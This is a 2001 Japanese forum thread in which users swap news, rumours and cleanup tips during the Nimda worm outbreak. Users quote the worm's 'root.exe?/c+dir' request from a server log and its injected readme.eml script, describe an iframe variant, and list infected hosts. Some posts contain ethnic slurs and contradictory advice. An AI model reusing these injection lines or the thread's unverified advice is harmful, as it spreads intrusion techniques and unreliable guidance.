まあｵｶｷだからギャグで通じるんじゃないか（藁

>>568
hotmailはwww,msn.co.jpにアクセスしないよね？だったら大丈夫　　　　だよね？

Nimda警報! 今すぐJavaScriptを切れ!
とか

>>572
　ありがとうございます　

>>568
自分さっきまでHotmail使ってたので
ここ見てﾋﾞｸｰﾘしたよ。

>568
ID面白い（笑

>>574
　どうもです

会社の感染したサーバー、
再インストしか修復方法が無かったら嫌だな・・・
鬱だな・・・

>>575
かなり重要

ふつうにJavaScript切ってれば回避できるような物なの？
＞ブラウザの種類バージョンに関係なく
おみとろんの有無とか

MS 製品を使っているのが悪い！自業自得だ！

http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]

W32.Nimda.A@mm 　危険度4

>>575
今回のはJavaScriptは関係ない。切っても対処にならない。

Yahooはダイジョウビなんだよね？
今、確認したら、IE5.50、ＳＰ２だった。よかった。
でも、当分は、Javaとかは、全部きっといたほうが良いね。

>>500
へぼ翻訳ソフトで訳してみたーり
　私たちは中国人です!
　検閲と性交して!
　ハッカー by ナイフ狂気

>>582
アクセスすると
JAVASCRIPTで新しいウインドウ開く
そしてダウンロード

>>583
自業自得といわれても・・・
使いたくないけど、使わざるをえない状態なんです、仕事上どうしても・・・

http://210.230.251.82/
http://210.222.81.202/
http://210.230.222.28/
うーむ・・

　proxomitron でもOK。「Kill add-on JavaScripts」 ね。
　自分でフィルタ作るとか。[Nimda Killed]　そうすればどこが感染してるかわかる。

>>589
あ、すまそ。
名前欄のところで笑ってもらえるとうれしかったんだけど・・・
すまそ。

明日、大学のお祭りぶりが目に浮かぶよ。
未だに、Win95とかだったりするとこだから。

あ、オレ、明日再試だった。
無くなってくれ再試！！
てか、これ、紙だから関係ないか。

他に感染した人教えて、readme.emlのタイムスタンプどうなってる？
自分の会社のサーバーのは
9/18 22:24
なんだけど。
これって、感染した日時かな？
削除しても同じタイムスタンプですぐに復活する。

WIN95がココにいるって(iДi)>>593

>>595

ｽﾏｿ。
でも、ﾀﾞｲｼﾞｮｳﾋﾞ？
URLは踏んでないの？

>>594
うちは、これが一番最初・・・。

202.XXX.XXX.185 - - [18/Sep/2001:21:50:25 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210

>>594
復活しないＹＯ

このスレ、結構重要だからageとこう。

Unicode Web Traversalのセキュリティパッチ
まだ出てないよね？

スレ名は、
やっぱり.....MSN撃沈！？

>>600
これ？
間違ってたらごめん。

http://www.jwntug.or.jp/tech/technote/articles.html?file_path=./secure/iis_unicode.txt

>>597
やはり、感染日時みたいですね。

>>596（510）
たぶん大丈夫。ボロPCの自覚あるし何よりﾋﾞﾋﾞﾘなんで
このスレにあるURLただのいっこもさわってなかった…（笑

祭りに参加できないのは寂しいけど。

Yahoo!のトップのところに出てるね

500のサイト見て大笑いしてたのは良かったんですけど案の定readme.emlがTemporaryフォルダにありました。
それを削除したのはいいんですがゴミ箱にも入らずどこかに行ってしまいました。
その後アプリが何一つ動かなくなって再起動したんですがエラーチェックのあとで、
「Windowsの設定を更新しました」って出たんですがこれってやばいんですかね？
ちなみにWin98、IE5.0です。

http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]

やっぱ、とりあえず。

「readme.eml」を、検索しといた方がいいのかな。

シマンテックのページではダメージは「低」に認定されてる。

>>602
ありがとうございます、それです。

18日配布開始って・・・
一歩遅かったか・・・

今からあてても、手遅れかな？
でもとりあえずあててみます。
なので、一時退散。

>>608
うちは Netscape なんだけど、キャッシュフォルダに、
readme.eml とは別の名前で残っていたりしたよ。

*.eml で検索をかけて、出てきた怪しいものを消したです。

>>608
readme.eml
readme.exe
MEP51B3.TMP.EXE
を検索すべし

>>611
>>612
ありがとです。
早速やります。

◆◆◆　警告　◆◆◆

とにかく、わけがわからないやつは
感染されたページを絶対見に行くな。

◆◆◆　マジ警告　◆◆◆

>>614
あまりに大規模感染してるからどこの鯖が感染してるかわからない。

◆◆◆　警告その2 ◆◆◆

JavaScript OFF

く〜寝たくないな〜
しょうがない　３時間だけ寝よう
起きたらこのスレ亡くなってるよな・・・

>>606
ぎゃー！
IEのバージョン確認しようとしたらmsnが開いたー！

エロサイト行ってわけもわからずQ2に繋がれてしまうようなオヤジは
確実に感染するんだろうな…。

反日って中国のことらったのれすね。
お〜こわっ！！

JavaScriptとか関係なく、5.5以前の人は
ひらけばもれなくおくられてくる？

JavaScript切ったIE5.01@win98SEで覗いてみたけど大丈夫だったよ。

Yahoo! ニュースの方々は夜勤体制とってるのかな？
ちゃんと、このウィルスについてトップで出てた！！
２ちゃんねらーなのかヤフー職員は・・・・・？？

<script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>
だから多分JAVASCRIPTをOFFにすれば多分大丈夫

あ、Javascript を有効にしてた・・・NC4.78 （汗

２８件ヒットしたよ

bach.cs.kobe-u.ac.jp/cgi-bin/metcha.cgi?q=readme.eml&speed=s&max=0&site=0&altavista=1&excite=1&fast=1&fresheye=1&goo=1&infoseek=1&lycos=1&nexearch=1&tocc=1&verno=1&yahoo=1

>>625
それーー
検索しよう
>>612
readme.eml
readme.exe
MEP51B3.TMP.EXE
を検索すべし

検索エンジンで２８てことは・・

で、キャッシュからreadme.emlを削除すれば大丈夫ですか？
「Windowsの設定を更新しました」って出たのがえらく気がかりなんですが。

>>500 のサイトは
トップページが
Last-Modified: Tue, 18 Sep 2001 13:09:40 GMT（日本時間18日22時9分）
クラックページが
Last-Modified: Wed, 15 Aug 2001 09:39:30 GMT（日本時間15日18時39分）

クラックされた後に今回のワームに感染したらしいな。
15日からずっと放置かよ。鯖缶のずさんさが際立つ…。

>>627
どもです。
とりあえず、ありませんでした。
今から virus scan をかけよう・・・

>>631
定義ファイルが更新されてないんだからスキャンは意味無いって。
定義ファイルが明日にも出るからそれまではおとなしくしてましょう。

２chて、
かなり信用できると思うから、
技術者でも見てる人多いよ。
きっと、
オレって、じつは大学の助教授にココ教えてもらったのYO
この人情報処理専門の人だったりしたしね。

>>630
しかも８月の15日ですね。

>>629
危険の予感！！

>>630
うわ、ほんとだ。見落としてた…。

>>630

http://uptime.netcraft.com/up/graph/?host=www.urban.meijo-u.ac.jp

ああ、八月十五日ってあの日じゃん

Javascriptは無効になってた。
初めて半角板逝ってて良かったと思った。

っていうか、8/15って終戦記念日か。なるほど。
それ以来放置ってすごいな…。

>>635
やっぱりやばいですか？
もし感染してたとして「これだけはするな」とか「これだけはしとけ」みたいなことあったら教えてくれませんか？

>>632
あ、更新されていないんですか・・・（大汗
おとなしくしておきます・・・

>>641
寝とけ、明日ワクチンソフトのアップデートをしてからネットしろ

>>641
ＺＡ起動

>>644
教えてください。
ＺＡを起動させてたら、何が分かるんですか？
今,インストールしてきたばかりなもので･･･

>>641
僕は厨房だよ！！
ごめんYO。

んで、
いちお、
最近ZoneAlarmつけたんだけど、よく鳴るんだよね。
これが・・・。
関係ないよね。

いま、ＭＳＮのページに見れる？
なんか、見れないよ

チョンとシナは氏ね

自分のパソコンへの不正アクセス抑えたり
アプリが外部へアクセスしようとすると教えてくれる

など

ZAとかってしらんけどさ、
要するにパケット監視だかポート監視だかでしょ？
だったらreadme.exeとは全く関係ない。
ZAがアラーム鳴らすからってWin98ユーザには一切関係なし。

ZoneAlarmってBlackIceみたいなものですか？
BlackIceなら入れてるんですけど・・・。

ずっと見れんよ！>>647

おとといくらいから msn uk 見れなかったんだけどこれが原因かな？

IE5.50 SP2 デス。

うち、Norton Internet Security を入れているけど、
今回に関しては、何の警告も出てこなかったよ。

>>651
http://salad.2ch.net/test/read.cgi?bbs=software&key=1000674038

id X bo

>>655
ちょうど俺にぴったりのスレですね。（ｗ

◆◆◆　あんたら入れてる意味無し逝ってヨシ　◆◆◆

ZA BlackIce NortonIS まったく関係無し。
はやく寝よう。

何げに、日大工学部スレもおもしろそう・・・

>>650
そうかもしれないけどアクセスログのIPにつなげると
MEP51B3.TMP.EXEとかダウンロードしちゃうのよ

誰かおせーて

これ？
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]

寝りゅ

>>660

ｻｲｺｰ。

感染しちゃったよ〜〜

戻ってきました。

Unicode Web Traversalのセキュリティパッチ
をあてて、再起動したら、しばらく動作した直後サーバーが死亡。
これから、出勤して確認しなければ・・・
鬱過ぎる。

おそらく、再インストだな・・・

>>665
こんな時間にお疲れ様です。(;´Д｀)

>>666

オーメン

>>660
WEBサーバがNimdaに感染。→HTMLにreadme.emlやreadme.exeを仕掛ける。
↓
あちこちのIISサーバめがけて増殖活動。
（これがZAにひっかかる。IISなのでWin98ユーザは関係ない。）

追記。
あちこちのIISサーバめがけて増殖活動。
（これがZAにひっかかる。IISなのでWin98ユーザは関係ない。）
（IPアドレスをブラウザで開くとreadme.exeがあったりするのは、
感染したWEBサーバにアクセスしてるんだから当然。）

>>665
そんなパッチどこにありました？

つまり、readme.exe経由で感染するのとZAが警告するのとは
全く別ルートの話なので無関係。

サーバ管理者の皆さんはこれから大変みたいですね。お体に気をつけて。

>>670

>>602です。

これから出勤しますので、私はもう落ちます。

>>673
この際UNIX系入れちゃえばいいのに。。
まぁ、そうもいかないのが企業なんだろうけど。
お疲れさまです。

結局readme.exeを実行するとどうなるの？

http://www.geocities.co.jp/Hollywood-Cinema/9063/http://www.geocities.co.jp/Hollywood-Cinema/9063/
http://www.geocities.co.jp/Hollywood-Cinema/9063/
一緒に将来を考えたい

http://search.fresheye.com/?kw=readme.eml&term=monthly
26件に増えてる

>>673
ありがとう。
全部パッチ当ててるハズなのに感染したよって人は結局なんだったんでしょう？

今日、会社が始まると一気に感染拡大しそうだし、
次スレのために一度情報を整理しないかい？

>>679
とりあえず、今日はジャバスクリプト切っとけばいいじゃないか？

　　／ ⌒ ＼　　　　　　　　　　　　　　　　　　　　　　　　
　（　(￣)＿)∧ ∧ 　　 ／￣￣￣￣￣￣￣￣￣￣　　　　　　　　　　　　　　　　　　　　　　　　
γ~~￣￣　 (; ﾟДﾟ)　＜　っていうかよその板の人はこれを知ってるのかな?　　　　
￣￣￣￣￣￣　　　　　＼＿＿＿＿＿＿＿＿＿＿

たぶんしらんだろ。

>>679
整理するなら鯖サイドとクライアントＰＣの対策法に分けるべきだな。
両方がごっちゃになるのはイヤン

　 ∧⊂ヽ　 ／￣￣￣￣￣￣￣　　　　　　　　　　　　　　　　　　　　　　　　
　 (ﾟωﾟ)ﾉ＜　無意味に知らせてみるね。
　　| ⊃|　　＼＿＿＿＿＿＿＿　　　　　　　　　　　　　　　　　　　　　　　　
　　| 　 |　　　　　　　　　　　　　　　　　　　　　　　　
　　⊂ノ〜　　　　　　　　　　　　　　　　　　　　　　　　
　　∪　

ｲﾔﾝ、祭りに乗り遅れた；；；
ttp://www.msn.co.jp/home.htm
ttp://www.msn.co.jp/
共に見れなくなってる・・・・
MSNの鯖缶、対応に追われるの巻。
南無・・・・

＞682
ネットワークセキュリティ板は、｢MSNでウイルス感染！？｣あるよ

情報整理。

ワーム名:W32.Nimda.A@mm（通称:Nimda）
詳細はここ。
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]

■クライアントサイドの対処。
感染しないための対処。
・JavaScriptをOFFにしてWEB閲覧をする。
・よくわからないファイルはダウンロードしない。
・仮にダウンロードしてしまっても決してファイルを実行しない（クリックしない）。
感染したかどうか確認する方法。
・
・
感染してしまった場合の対処。
・
・

■サーバサイドの対処。
対象はIISサーバ。Apacheなどは関係ない。

以下、お任せします。

しかし韓国からが異様に多いな

ど〜もでした。
ちなみに、ZAのアクセスは、61.179.112.66からでした。
ほかにもあったのですが、すべて、Asia Pacific Network Information Center
みたいです。
んじゃ寝ます。

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-020.asp

このパッチを当てておけ　マジに。

書き方が悪かったが
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-020.asp
は
Internet Explorer 5.01 Service Pack 1
Internet Explorer 5.5 Service Pack 1
までで　ほったらかしてるユーザー向けだ

パッチを当てておかないと　ダウンロードのﾒｯｾｰｼﾞも出ずに
実行されてしまう。
もしくはIE5.5SP2 IE6への移行をお勧めする。

Internet Explorer 5.01 Service Pack 2
のマシンの人はどうですか？

>>687

寝るんで後はよろしくですよ。

MSNは最新パッチあててなかったのかな・・・信じられん。
Nimdaは新しい穴をついてるような気がしてならんのは、
漏れだけか？

5.00の対処方法も教えてくんなまし

>>694
それはまた別問題。

スレッド立てずに適当にアナウンスしただけだと
返事が無かったよ・・・。

　　　∧ ∧　 　／￣￣￣￣￣￣￣￣￣￣￣￣￣￣　　　　　　　　　　　　　　　　　　　　　　　　
　　　(　　,,)　＜　　ちぇっ！　　　　　　　　　　　　　　　　　　　　　　　　
　　/⊃⊂　　 ＼＿＿＿＿＿＿＿＿＿＿＿＿＿＿　　　　　　　　　　　　　　　　　　　　　　　　
〜（　＿つ　　　　　　　　　　　　　　　　　　　　　　　　
　　し'　　　ミ o　

>>695
IE5.5SP2 or IE6入れてくれ。

すでに感染した模様ですw

>>699
感染したらメール勝手に送るから恥かしいぞ。

>>697
たぶん　モナー板とか
ズレるからとかいう理由でIE古いまま使用してる人多そうなので
怖いなー。

>>685

どんな状況か知りたいなら、
ttp://search.fresheye.com/?kw=readme.eml&term=monthly
この先にリンクされているページを見に行ってごらん！
ただ、ジャバスクリプトを切ってね。後はソースを見るだけ！

>>697
うちには来てないぞー。
全部の板に布教してくれ。

ダウンロ−ドメッセ−ジが出てこなかった。
よく解らんがOffice2000が壊れた気がする。
何度再起動してもメモリ−または
リソ−ス不足だってよ・・・

だから　見に行くなってば
IE5.5 SP2 以上で見に行くならいけ

>>687
JavaScriptを切っていても感染させる方法はある。
<IFRAME SRC="readme.eml"> でいけるはず。
設定で仮対処するなら、インターネットオプションのセキュリティ設定の
「ファイルのダウンロード」を「無効にする」に設定しれ。

>>700
メール送ったかどうかは履歴か何かでわかりますか？
もしメールを送ったような跡がなければ感染してないと思ってもいいんでしょうか。

>>700
まじですか

おはよ。わー。やっぱすごい事になってるね。
いまテレ東のニュースでやってたよ(^^;
米の司法当局が捜査してるってさ。

>>702
すげー(^^;
時すでに遅しだなｗ

なんかCドライブに変なファイルが自動的に出来てる。
削除してもダメだ。見ちゃいけないの？

発病症状:
大量メール送信: MAPIを使って自分自身をREADME.EXEとして送信する

ファイル改ざん: 多数の正当なファイルをそれ自身で置き換える

パフォーマンス低下: システムをスローダウンさせる

不正アクセス: Cドライブをネットワーク共有する

>>500
のサイトを見に行っちゃった者ですが、
見に行っただけでも感染しますか？
初心者なのでｽﾏｿ

>>713
ブラウザのバージョンは?

IE 10.0 ですが、何か？

http://search.fresheye.com/?kw=readme.eml&term=monthly
<丶｀∀´>ニムダ! <丶｀∀´>ニムダ! <丶｀∀´>ニムダ!
http://search.fresheye.com/?kw=readme.eml&term=monthly
<丶｀∀´>ニムダ! <丶｀∀´>ニムダ! <丶｀∀´>ニムダ!
http://search.fresheye.com/?kw=readme.eml&term=monthly
<丶｀∀´>ニムダ! <丶｀∀´>ニムダ! <丶｀∀´>ニムダ!
http://search.fresheye.com/?kw=readme.eml&term=monthly
<丶｀∀´>ニムダ! <丶｀∀´>ニムダ! <丶｀∀´>ニムダ!
http://search.fresheye.com/?kw=readme.eml&term=monthly

>>714
713です。IE5.5 ←この事ですか？

>>716
寝不足で壊れた？？？ヽ(´ー｀)ノ

>>713
可能性あり。
スタートメニュー→検索→ファイルやフォルダを選び、
名前の項目に以下を一行ずつ入力して検索してみる。

*.eml
readme.exe
MEP51B3.TMP.EXE

これで感染の有無がとりあえず判断できる。

んあーニュースでやってたのか
見逃した…
つーかカルーセル巻きﾀｲｰﾎってネタじゃなかったのか。

駆除できた人います？

いまＮＨＫでやってなかった？

>>714
IEのヘルプ(H)
の中にバージョンがあるのでそれで確認して
更新バージョンのとこにSP2と無かったら終了。感染済み

　|　　　　　　　　　　　　　　　　　　　　　　　　
　|⌒彡　　　　　　　　　　　　　　　　　　　　　　　　
　|冫、）　　　　　　　　　　　　　　　　　　　　　　　　
　|` ／　　　　　　　　　　　　　　　　　　　　　　　　
　| /　　面白いほど反応が無いから寝る。　　　　　　　　
　|/　　　　オヤスミ。

>>719
やってみます。再起動させても
「不正処理を行ったので強制終了します」が
バンバンですのですが・・。

まだ読んでないけど。
http://wired.com/news/technology/0,1282,46944,00.html

http://www.microsoft.com/JAPAN/support/kb/articles/JP290/1/08.htm
日本語
パッチ

駆除は？

>723
ＩＥ5.01SP2は？
JAVA完全に切ってるから大丈夫だと思うけど。

JAVAの設定にいろんな項目あったけど、どれを切ればいいんですか？

無効にしとけ。

とりあえず、readme.exeを検索して全部消せ。
感染してるなら数千ファイル見つかる筈だ。
■■■やりかた■■■
[スタート]→[検索(F)]→[ファイルやフォルダ(F)]を選択。
名前(N)を「readme.exe」、探す場所(L)を「(C:)」にする。
[検索開始(I)]を押す。
検索が終わったら[編集(E)]→[すべて選択(A)]を選択。
ドラッグしてゴミ箱へ移動(またはファイル削除)。

判らないならJavaもJavaScriptも無効にしておけ。

再起動したらシステム更新された

>730
セキュリティ→レベルのカスタマイズでJava１つとJavaScript３つの
項目、すべて無効にしておくのがよいです。

ついでにActiveXも有効じゃないほうが無難。

とりあえず知らせた方がいいの？

ん？MSN落ちたか？

>>732
これで検索してみて、何も無かったら
大丈夫なのでしょうか・・・？？？

>>736
モナー板でやったら板違いって怒られた。
自分はほっとく事にした。

鬱だ詩嚢

>>735
無難つーかアレこそ危ないんじゃないの？

>>737
ずっと落ちたまま。
一度は対策去れたように見えたんだけどね。再度やられたんでしょう。

＞739
そんなに心配いらないってことですか？

>>739

やつらのIEマジで古いよ

>>726 http://wired.com/news/technology/0,1282,46944,00.html より訳出

インターネットエクスプローラーでスクリプトを無効にするには、ツールメニ
ューから、「インターネットオプション」を選択し、「セキュリティ」タブをクリッ
クし、次に、「カスタム設定」オプションを選択してください。「スクリプト−ア
クティブスクリプト」の設定を「無効にする」に変更してください。同じことを、
「インターネット」「イントラネット」「信頼済みサイト」「制限付きサイト」の4つ
のゾーンのそれぞれに対して行ってください。

>>739
最近のモナ板はなぁ…アレだから…
まぁ、元気出せ

>>739
わかんない。
セキュリティー板では↓だって。

56 名前：名無しさん＠お腹いっぱい。 ：01/09/19 07:11
感染サイト(^^;
http://search.fresheye.com/?kw=readme.eml&term=monthly
今日の昼頃には感染サイトが爆発するでしょう

a

このサーバーもやられてるよ！！！！！！
このページのソースの最期のとこ、見てみろ！！！！
Javaを、いますぐ切れ！！！！！！！

>>745
ありがとう〜
レスのみにしてたけどあんまり反応ないから
ついついスレッド立てちゃった・・・。

　　　 ∧ ∧　 　　　　　　／￣￣￣￣￣￣￣￣￣　　　　　　　　　　　　　　　　　　　　　　　　
|￣￣（ ﾟДﾟ)￣￣|　　　＜　　ホントにおやすみ〜。　　　　
|＼⌒⌒⌒⌒⌒⌒＼ 　　＼　　　　　　　　　　　　　　　　　　　　　　　　
|　 ＼ 　　　　　 　 　 ＼ 　　￣￣￣￣￣￣￣￣￣　　　　　　　　　　　　　　　　　　　　　　　　
＼　 ｜⌒⌒⌒⌒⌒⌒｜　　　　　　　　　　　　　　　　　　　　　　　　
　 ＼ |＿＿＿＿＿＿＿|　　　　　　　　　　　　　　　　　　　　　　　　　

24どころじゃないよ。
当方の管理するサーバーへのｱﾀｰｸリストみてユニークipリストだしてみたら
292ユニークバカ鯖もあったよ
感染したサーバーリスト作ろうかなって犠牲者増えるだけか。

IEよりJavaVMのバージョンを確認しなさい

JAVA VMは関係ないだろ

Microsoft Internet Explorer 5.01, 5.01 Service Pack 1, 5.5, 5.5 Service Pack 1 for Windows 2000
Microsoft Internet Explorer 5.01, 5.01 Service Pack 1, 5.5, 5.5 Service Pack 1 for Windows 95
Microsoft Internet Explorer 5.01, 5.01 Service Pack 1, 5.5, 5.5 Service Pack 1 for Windows 98
Microsoft Internet Explorer 5.01, 5.01 Service Pack 1, 5.5, 5.5 Service Pack 1 for Windows 98 Second Edition
Microsoft Internet Explorer 5.01, 5.01 Service Pack 1, 5.5, 5.5 Service Pack 1 for Windows NT 4.0
Microsoft Internet Explorer 5.5, 5.5 Service Pack 1 for Windows Millennium Edition

該当するIEで感染サイト見たら終了。

あげ

5.00はどうですか？

IE4.01sp2は、もうだめ？

>755
>756
合掌・・・

てゆーか、何でパッチ当てたりバージョンアップしないの？

パート２作って、警告しよう。
テレホなんで落ちます。ｽﾏｿ

テストしたバージョン :
マイクロソフトは Internet Explorer 5.01 および 5.5 のテストを行い、この脆弱性による影響を評価しました。それ以前のバージョンに関してはサポートしておらず、この脆弱性による影響は不明です。

たぶんダメなんじゃねーの?

そろそろ○○は笑えた！のコピペが出るかなぁ〜？

NHK、ニュース流せ！
会社に行ったらOutlook起動する前にIE5.5SP2にアップグレードするように
って。

>>761
つーかしたいんだけど、今しに逝っても大丈夫？

ははぁ。
やっぱりIE4はだめっぽいですか。
ありがとうございました。

NHKでマカラニアン

>>762
windowsupdate.microsoft.comは大丈夫みたいだ。

>>762
なんでダメよ？
msn.co.jp は止めてくれてるんだし(w

ネスケのキャッシュにemlあったけど、削除したら問題なし？
IEはJAVAもJavaScriptもダウンロードも
無効にしてるけどIE5.5SP2以上じゃないとやられる？
初心者でｽﾏｿ、、、

あ〜、マカーでよかったよ。

http://download.microsoft.com/download/IE60/fnlrtw/ie6/W98NT42KMe/JA/ie6setup.exe

どうせならIE6入れとけ。
ブラクラを無視する機能もついてて　とってもにちゃん向きだぞ

>>765-766
怖くて動けないのよ
大丈夫っつーなら逝ってくるよ

なんか思ったより静かですね。

すくなくとも 769で落とせば大丈夫だ

どれどれ　サーバーの様子みてくるか。
会社が始まりだしたぐらいの時間のときに酷いことになりそう

サービスパックって何？

>>770
なんで人に頼るんだよ。
自分で判断しろ。
そんなに怖かったらformatでもしとけ

NHKーー臨時ニューーーースやれーーー それで何万人かが救われるぞ。
台風情報もいいけどな、これも重要だろ！
後から報道したって遅いんだぞ。

>>774
サービスパク　いれとけ。

view-source: で見た限り、windowsupdate.microsoft.com は
感染してないようだよ。サービスパックいれとけ。
さて、そろそろ出勤するか。会社はどうなってるかな。（ｗ

http://search.fresheye.com/?kw=readme.eml&term=monthly
30件(^^;

サービスパックって・・・・

パッチの最終系だっけ？こんな感じ？？
緊急修正パッチ→ウィンドウズアップデータ→サービスパック

違うかな？(^^;)

適当にひろってきたよー やられたとこ
siu-s005.suzuka-iu.ac.jp
dns1.astr.co.jp
ns.kohken-net.co.jp
fw075.rosenet.ne.jpdns1.ybk.co.jp
www.atc.ne.jp
www.informarc.co.jp



www.totsumedia.co.jp
www.dreamgate.ne.jp
proxy.jbc.ac.jp
oceansv.ocean.ne.jp

だれか整理してくれ〜
サーバはWiindows2000SP2
ブラウザはIE5.5SP2
でとりあえず安全ってことでいいの？

IISを運用するサーバーはSP2でもだめかもしれない
もうちょっと検証しないとわかんない。

ブラウザはIE5.5SP2で良い

これからはIE2がいいかもな。

こりゃなんかかなりキツいね・・・・
SP1以前のユーザーって多そうだし(^_^;)警告出した方がいいかな？
誰か情報をまとめてもらえると嬉しいな。サイトの形で(^_^;)

取りあえず、しばらくはJavaScript切っておく
ほうがいいんじゃないの。
まだ、完璧にウィルスの正体がわかったわけでもないし、
これから、他のテロ関係のウィルスが出てくるかもしれんし。

ちなみに、中国ってイラクにレーダー網とかの援助とか
してんだよね。江沢民が、アメリカを支持するとか
ほざいてるけど、結局、あいつらもテロの一翼を
になってるのに。

>>782
今のところ、
*.eml
readme.exe
MEP51B3.TMP.EXE
この3つのファイルを検索してみて無ければ大丈夫じゃないか？

大きなデマだな〜

>>785 マァヴさん
そのうち
http://www.st.ryukoku.ac.jp/~kjm/security/memo/
に出ると思いますです…

キャップの人まで書き込んでるし・・・ニュース速報では珍しいかも？(;´Д｀)

警告があるのはここだけかもしれませんね。
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]

ぷぷ www.informarc.co.jp
「当ページはNetscape 3.0以上　Internet Explorer 4.0以上でご覧ください 」
の文字がむなしいなー。

あ　見ちゃだめよ　ウツルから。

>>789
なんだけどさ。
それこそ速報的に警戒を呼びかけたり、チェック方法を伝えたり
不確定ながら現状を伝えられれば２ｃｈも役に立つじゃん(^_^;)。
もし用意してもらえるなら各板のTOPにデカデカと「警告」っていうリンク貼って
衆知させるってのはどうかなと・・・・。

兎に角、IE5.5SP2にしろ!!!
ごたごた言うなって事でどうですか?
Java切れだのなんだの指導は。だるぃ。

って・・・ダメージが小から中に格上げされてる。(;´Д｀)
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]

>>793
それだけでもかなり有効な情報だよね。

W32.Nimda.A@mm
発見日: 2001年9月18日
Symantec Security Responseは、W32.Nimda.A@mmの被害報告が数
多く寄せられていることから、このワームの危険度を4と評価します。
W32.Nimda.A@mmは、多数の感染方法を持つ新しい大量メール送信の
ワームです。ワームは電子メールで自分自身を送り、有効なネットワ
ーク共有を捜して、修正プログラムが適用されていないMicrosoft I
IS Web サーバにワーム自身をコピーしようと試みます。ワームはUn
icode Web Traversal と呼ばれるセキュリティホールを使ってこれ
を行います。この脆弱性に対する修正プログラムと情報は下記のペー
ジをご覧下さい。
http://www.microsoft.com/japan/technet/security/prekb.asp?
sec_cd=MS00-078
W32.Nimda.A@mmは、電子メールを使って感染を広げる新しい大量メー
ル送信ワームです。それは、readme.exeという添付ファイルで届きま
す。
危険にさらされた Web サーバを訪問しているユーザは、.EML (Outl
ook Express)電子メールファイルをダウンロードするよう促されるで
しょう。そしてそれは添付ファイルとしてとしてワームを含んでいま
す。
また、ワームはシステムへのアクセスを許可するためにネットワーク
共有を有効にします。

http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]
まだ夕べ出たばかりのワームなんで　これぐらいしかないと思われ。。

とにかく会社就業時間になったらあちこちで終了だよー。

危険にさらされた Web サーバを訪問しているユーザは、.EML (Outl
ook Express)電子メールファイルをダウンロードするよう促されるで
しょう。そしてそれは添付ファイルとしてとしてワームを含んでいま
す。
また、ワームはシステムへのアクセスを許可するためにネットワーク
共有を有効にします。

>>797
そりゃそうだ(^_^;)っていうか、そうであってほしい・・・・

>>792
なるほど、情報の速い2chならではってことですね。
でも現状でどこまでまとめられるか…?
とりあえずわたしはこれから出勤なので(ぉ

ネットワーク共有を勝手に有効にするからチェックしとけ

toマｧヴ

WEBを見るだけで感染するウイルスが昨夜から自己増殖しております。
2chとしましては技術云々はどうでも良いので、何がなんだか
わからない人はインターネットエクスプローラーSP2に
バージョンをあげる事によって
「見ただけで感染」は防げます、その後も
WEBから不信なプログラムをダウンロード
しない事をお勧めいたします、


#ブラクラはリセットすりゃなおるが
#これはリンクされただけでフォーマットしないとだめだしのう。

>>800
でしょ？(^_^;)
こういう場合はマスコミなんかより圧倒的に速いし、情報の鮮度高いのが２ｃｈだもんね。
全板で告知すれば、強力なニュースサイトに化けるって、さっき気がついたりなんかして(^_^;)
今回は間に合わなくても、そういう体勢作っとくってのはありだよね。

>>780
パッチ→hotfix→サービスパックの順。

パッチはMicrosoftのサポートに連絡したときにMicrosoft側の判断により
提供されるもので、一般には公開されない。インストーラさえ用意されていない
ことが多い上、応急措置であるため。

url開かないよ？？

（　´∀｀）y-〜　Winは大変だ……

>>805
> 36 bytes from as8069.ix.jpix.ad.jp (210.171.224.116): Communication prohibited for icmp_seq=9
だってさー。ネットワーク的に切られているっぽい。（どこで切れてるかは知らないけど）

とりあえず関係のありそうなリンク
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]
http://www.cert.org/current/current_activity.html#port80

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-020.asp
http://www.microsoft.com/JAPAN/support/kb/articles/JP290/1/08.htm
http://www.jwntug.or.jp/tech/technote/articles.html?file_path=./secure/iis_unicode.txt

>>807
おー、そうなんすか。
サンクス！

>>802

WEBを見るだけで感染するウイルス（Windows向け）が
昨夜（９／１８）から自己増殖しております。
2chとしましては技術云々はどうでも良いので
何がなんだかわからない人はインターネットエクスプローラーSP2に
バージョンをあげる事によって「見ただけで感染」は防げます。
その後もWEBから不信なプログラムをダウンロードしない事をお勧めいたします、
WindowsUpDateへのリンク

#ブラクラはリセットすりゃなおるが
#これはリンクされただけでフォーマットしないとだめだしのう。

見損なったぞNHK！
ビジネスマン達はもう出勤しちゃっただろうよ。
もう受信料は払わなくていいね。

>>803
ただ憶測とデマの飛び交う 2ch でどこまでやれるかという
のもあると思うですが(w

とりあえず板トップにこのスレ (もしくは次スレ) へのリンク
を貼るというのはアリかもしれないですね。

JAVAを新しい奴に変えればいいの？

>>809
ついでなんて簡単に調べてみた。

jpix.ad.jpってのは日本のインターネットの中枢的な場所で、
おそらくmsnはソコから直接接続していると思う。msn側で意図的に
切ったのか、それともjpixが切ったのかは判らないが、
とりあえず被害をくい止める良い方法なのではないかと。

toマｧヴ
WEBを見るだけで感染するウイルス（Windows向け）が
昨夜（９／１８）から各地のWEBへ自己増殖しております。
~~~~~~~~~~~~~~~~~~
各自WindowsUpdateを行なってください　で良いかな
リンク先ってWindows98 2K Meによって違うし。

>>813
IEのバージョンを最新のモノ(IE5.5 SP2)にする。
あとはWindows Updateで引っかかるモノは全て入れる。

JAVAは関係ないですMIMEヘッダーに関する糞バグです。

あーあ、ごみ箱にとっておいたのに、
PC Cillin(ウイルスバスターの英語版)をUPDATEしたら
隔離されちゃったョ。フロッピーにとっておけばよかったな。

>>186
うおっ、がいしゅつだったが再度貼り。

http://people.site.ne.jp/HTTP_REFERER/index.html
http://people.site.ne.jp/HTTP_REFERER/txt/unicode.txt
